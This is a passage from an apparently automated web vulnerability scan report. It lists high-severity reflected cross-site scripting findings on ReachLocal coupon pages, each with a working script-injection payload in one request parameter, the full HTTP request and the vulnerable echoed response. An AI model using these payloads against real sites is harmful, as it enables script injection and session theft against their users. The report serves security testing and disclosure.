Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:08 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3043
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:00 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargi
...[SNIP]...

2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d06"><script>alert(1)</script>76c9d147fa9 was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:16 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3061
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:09 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92f9"><script>alert(1)</script>de87c2b7e5 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:55 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3015
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:48 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6519"><script>alert(1)</script>c8b035ec73b was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3056
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61005"><script>alert(1)</script>ee0a10336fd was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:12 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 2891
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:05 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3305c"><script>alert(1)</script>2dc212c00e9 was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3047
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...

2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2e"><script>alert(1)</script>2688833dcab was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 846db"><script>alert(1)</script>3e97297b77d was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:53 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1846db"><script>alert(1)</script>3e97297b77d&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1" target="RL_top"
...[SNIP]...

2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8930"><script>alert(1)</script>784bb32d3 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3259
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:51 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
<a class="ad_header_url" href="/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292e8930"><script>alert(1)</script>784bb32d3&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790de"><script>alert(1)</script>9051fd7fffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3269
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:04 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>ReachLocal Index</title>

<LINK href="h
...[SNIP]...
&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1&790de"><script>alert(1)</script>9051fd7fffb=1" target="RL_top" onClick="javascript:open_popup('/coupon/d837/837045/index4.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&prima
...[SNIP]...

2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fcc"><script>alert(1)</script>222f71544b5 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

